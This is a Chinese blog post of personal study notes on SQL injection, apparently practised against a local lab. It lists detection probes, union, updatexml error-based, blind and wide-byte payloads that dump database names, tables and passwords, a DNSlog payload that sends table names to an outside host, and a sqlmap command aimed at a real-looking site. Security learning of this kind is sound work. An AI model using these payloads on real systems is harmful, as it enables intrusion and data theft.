注入相关知识总结

最新推荐文章于 2024-07-06 13:58:06 发布
最新推荐文章于 2024-07-06 13:58:06 发布
阅读量57 收藏
点赞数 1
分类专栏: 漏洞相关 文章标签: oracle 数据库 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_79194110/article/details/132803316
版权

1.了解注入情况的网址

   http://wooyun.2xss.cc/searchbug.php?q=SQL%E6%B3%A8%E5%85%A5

2.注入的原理及注入方式

  • 注入的原理

   参数赋值给变量未经过滤直接进入数据库查询操作 

   注入属于服务端的注入

   注入与操作系统类型、数据库类型、脚本语言类型无关

  • 注入漏洞的检测方法 

‘  单引号

and 1=1  and 1=2 

or

xor

and  sleep(x)     

and ascii(substr(database(),1,1))=112

  • 如何找注入 

1.有参数 并且与数据库产生交互

2.登录的地方、插入的地方、更新的地方、删除的地方、注册的地方、查询的地方、留言的地方(留言要保存在数据库)

3.可能出现注入的地方:get头、post头、cookies头、user agent头、referee头等

3.注入的分类 

  • 数字型

http://10.0.0.130:90/sql.php?id=1

  • 字符型

http://10.0.0.130:90/sql.php?id=abcd

  • 搜索型 

vince' or 1=1#  

 '%vince%' or 1=1;

  • xx型(特殊类型) 

username=('xx') or 1=1; 

4.注入的提交方式 

  • get提交

地址栏可以看见参数

  • post提交

可以通过burp抓包

  •  cookies提交

通过burp抓包,id在cookiies 

5.注入攻击支持的类型

  • union注入

     union一般与order by配合使用 

     ①http://10.0.0.130:90/sql.php?id=1'   先查询是否有注入点

  ②http://10.0.0.130:90/sql.php?id=1  order  by 1

  ③http://10.0.0.130:90/sql.php?id=1  order  by 5 

 ④http://10.0.0.130:90/sql.php?id=1  order  by 4

⑤http://10.0.0.130:90/sql.php?id=1 union select  1,2,3,4       爆出1.2.3.4 说明1.2.3.4可写

⑥ http://10.0.0.130:90/sql.php?id=1 union select  user(),2,3,4

⑦ http://10.0.0.130:90/sql.php?id=1%20union%20select%20database(),2,3,4

1234均可以爆破 

  • 基于函数报错注入

updatexml

注入方式
                  载荷注入
                  insert注入
                  updata注入
                  delete注入

报错的信息获取
    UPDATEXML (XML_document, XPath_string, new_value); 
    第一个参数:XML_document是String格式,为XML文档对象的名称,
    第二个参数:XPath_string (Xpath格式的字符串)
    第三个参数:new_value,String格式,替换查找到的符合条件的数据 

手工爆破试验
    爆数据库版本信息
        k' and updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1) #


    爆数据库当前用户
        k' and  updatexml(1,concat(0x7e,(SELECT user()),0x7e),1)#  


    爆数据库
        k' and updatexml(1,concat(0x7e,(SELECT database()),0x7e),1) #


    爆表
        k'and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='pikachu')),0)#


    爆字段
        k' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users'limit 2,1)),0)#


    爆字段内容
        k' and  updatexml(1,concat(0x7e,(select password from users limit 0,1)),0)#

extractvalue

floor

盲注(没有任何结果展现出来)

  •  基于布尔型SQL盲注(ascii码)

       在布尔型可以测时间型

       select ascii(substr(database(),1,1))>xx;
        vince' and ascii(substr(database(),1,1))=112#


         vince' and ascii(substr(database(),1,1))=113#

  •    基于时间型SQL盲注

        vince' and sleep(x)#
         WAITFOR DELAY '0:0:5'--
        在时间型里不能测布尔型

  •        基于报错型SQL盲注

堆叠注入

 多条语句同时执行用;隔开(并不是所有的都支持堆叠注入)
   http:// https://www.cnblogs.com/0nth3way/articles/7128189.html 

宽字节注入

 跟GBK有关,%df' or 1=1
  魔术符号被开启,’会被转换为/,对数字型影响不大,对 字符型影响大
      vince%df' or 1=1#

  要结和burp

vince%df' or 1=1#   修改信息              

 还有很多函数有类似的作用如:addslashes()、mysql_escape_string()、   mysql_real_escape_string()
原理
        对方开启魔术符号,对方的编码要是gbk,通过%df构造两个字节,汉字将被转义的这个位置占掉

6.伪静态与cookies注入

1. DNSlog注入

http://www.dnslog.cn/
 show variables like '%secure%';在2003的登入mysql

secure_file_priv="";   只有添加了这一行才会有下面的

重启phpstudy


 在dnslog获取,更改其中的信息

and if((select load_file(concat('\\\\',(select table_name from information_schema.tables where table_schema=database() limit 0,1),'.o51xcb.dnslog.cn\\abc'))),1,0)--+ 

2.cookie注入


    当我们打开get或post页面的时候,发现有注入防范,可以把get或Post参数写入到cookie里面进行测试注入,有的时候程序未对cookie注入进行防范(注:前提是接收用户参数的地方是request并卫队cookie进入防范)

3. 伪静态

https://cn-sec.com/archives/886203.html
 如何识别是否为伪静态页面
  ①使用网站最后修改时间识别是否为伪静态
   打开页面的右键检查输入javascript:alert(document.lastModified)
    在这个页面输入

如果返回的时间是当前的时间,那么就基本上可以判断为伪静态页面了,如果返回的时间是之前的时间就可以判断为静态页面。


    ②删除后缀识别是否为伪静态
       正常页面 删除扩展还是正常页面是伪静态页面,出现错误是静态页面
    判断是否存在注入
        使用数字相减来判断,页面显示一样存在注入点
        使用and 1=1和and 1=2判断,页面显示不一样可能存在注入点
     使用SQLMap进行注入
        python2 sqlmap.py -u https://www.oldboyedu.com/zuixin_wenzhang/index/id/523*.html
        注意*
    使用google寻找伪静态网站
        inurl:php?id/1.html

布满杂草的荆棘
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
知识总结
TigerwolfC的博客
06-01 469
列举几种常见的协议,并简述他们的作用 ICMP协议:因特网控制报文协议。它是TCP/IP协议族的一个子协议,用于在IP主机、路由器之间传递控制消息。TFTP协议:是TCP/IP协议族中的一个用来在客户机与服务器之间进行简单文件传输的协议,提供不复杂、开销不大的文件传输服务。HTTP协议:超文本传输协议,是一个属于应用层的面向对象的协议,由于其简捷、快速的方式,适用于分布式超媒体信息系统。DHCP...
SQL注入知识总结
ma963852的博客
03-30 9724
目录 漏洞原理 漏洞危害 利用方式 手工注入 手工注入步骤-基于联合查询: 1、判断注入类型 ​2、查询字段数 3、判断回显位 4、查询数据库的基本信息 5、查询数据库中的数据 报错注入 xpath语法错误 ​ 无回显无报错 1,布尔盲注 2,时间盲注 3,带外注入 4,SQL注入命令执行一 4,SQL注入命令执行二 堆叠注入 HTTP头注入 宽字节注入 二次注入 自动化注入 SQLMAP sqlmap特性 输出的内容 设定目标 综...
sql注入知识总结
JunDao73的博客
02-16 3107
个人的学习记录,主要推荐学习环境,和总体的针对sql注入漏洞想要得到数据库内容的思路还有注入中利用到的函数介绍。
sql注入详解
热门推荐
good good study
05-05 20万+
SQL注入(SQL Injection)是一种常见的Web安全漏洞,主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。 从而导致数据库受损(被脱库、被删除、甚至整个服务器权限陷)。 即:注入产生的原因是后台服务器接收相关参数未经过滤直接带入数据库查询...
sql注入知识总结.pdf
02-11
根据网上视频课程学习总结知识点,文档结构分为SQL注入概述、SQL注入分类、SQL注入流程、SQL注入方法、自动化注入做出总结 整理为文档 可以方便查阅
XSS注入知识总结.pdf
02-07
该文档是在看网络学习视频总结,从XSS漏洞概述,XSS分类,XSS构造,XSS变形,XSS的利用,XSS的防御进行总结,分章节进行叙述,可作为学习文档。
php+laravel依赖注入知识总结
10-16
在本篇文章里小编给大家整理的是关于php+laravel依赖注入知识点内容,需要的朋友们学习下。
计算机知识总结.doc
12-16
在计算机知识总结篇二中,该人员总结出了自己作为销售员的经验教训,包括服务态度至关重要、创新注入新活力、诚信是成功的根本和付出才有收获等。这些建议对计算机技术人员也非常有用,因为他们在工作期间也需要...
WEB安全知识总结.zip
12-27
【WEB安全知识总结】 在网络安全领域,Web安全是至关重要的一个环节,因为它涉及到用户数据的保护、企业资产的安全以及服务的稳定运行。本总结将深入探讨一些常见的Web漏洞及其防范措施,帮助读者快速掌握Web安全的...
10.javaSE基础_JDBC编译程序(Driver+Statement+Connection+mysql数据库连接)
m0_61086522的博客
07-02 1218
JDBC是的缩写。它是Sun的Javasoft公司制定的Java数据库连接技术,是一套标准接口java.sql包中提供了JDBC API,通过它连接到各种数据库系统,编写访问数据库的程序。JDBC API不能直接访问数据库,它依赖于数据库厂商提供的JDBC Driver(JDBC驱动程序)
数据库——事务管理
最新发布
longer_net的博客
07-06 794
事务是数据库管理系统中的一个概念,用于管理一组数据库操作,使它们作为一个不可分割的工作单元执行。一个事务可以包含一个或多个SQL语句,这些语句要么全部执行成功,要么全部回滚(撤销),从而确保数据库的数据一致性和完整性。
Oracle HTTP Server(OHS)与Oracle数据库的紧密绑定
codedadi的博客
07-03 491
OHS(Oracle HTTP Server)通过mod_plsql访问Oracle数据库是一个特定的配置过程,它允许HTTP请求直接执行PL/SQL代码。请注意,由于Oracle产品和技术的不断更新和变化,上述步骤和配置指令可能需要根据你的Oracle HTTP Server和mod_plsql的具体版本进行调整。配置mod_plsql的特定参数,如数据库连接信息、用户权限等。可能需要创建特定的表(如上面的MY_PLSQL_DOCS)来存储PL/SQL文档的信息,这取决于mod_plsql的配置和版本。
Python中使用Oracle向量数据库实现文本检索系统
engchina的专栏
07-03 334
Python中使用Oracle向量数据库实现文本检索系统
ORA-12170: TNS:连接超时
qq_44021627的博客
07-04 219
确认防火墙是否开通。目标的数据库是一个集群,因此很有可能是只申请开通SCANIP的防火墙。正确的方式应该是申请物理IP、VIP和SCANIP,缺一不可。要求查看下创建dblink语句,也确认创建语句无误。但是是能够ping的通远程数据库地址的。
MySql 默认的四个数据库,以及相关的表和查询语句
yuiezt的专栏
07-03 348
MySQL数据库安装完成后,会包含一些默认的系统表,这些表主要用于存储数据库系统的元数据、权限、用户信息等。
Sqlserver 如何创建全局只读账号?
xiaofan23z的专栏
07-04 250
由于SQL Server不支持全局数据库权限,因此需要在每个数据库中创建用户并授予其只读权限。可以使用动态SQL脚本来为所有现有数据库设置权限,具体脚本如下。当然也可以使用SSMS通过界面来创建登陆名和设置权限,但是不如脚本方便。其他sqlserver常用sql。
oracle典型的增量备份方案
lmxx2020的博客
07-01 433
采用sh文件来调用这三个级别的备份。三个sh的文件可命名为lev0.sh、lev1. sh、lev2. sh。这三个备份脚本对应文件lev0.rcv、lev1.rcv、lev2.rcv。1、level 0备份脚本。采用crontab来制定计划任务。2、level 1备份脚本。3、level 2备份脚本。
数据库第01讲章节测验(选项顺序可能不同)
2301_76219154的博客
07-05 729
这是数据库章节测试01的复习题
雷电防护复习非常详细笔记
11-18
其中,耦合电容的概念是设备间通过信号线与接闪器产生的电容,当雷电发生时,这种耦合可能导致大约10A的电流注入。钢筋网可以作为屏蔽结构,同时兼作接地系统的一部分。在等电位连接中,MEB线代表总等电位联接,LEB...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值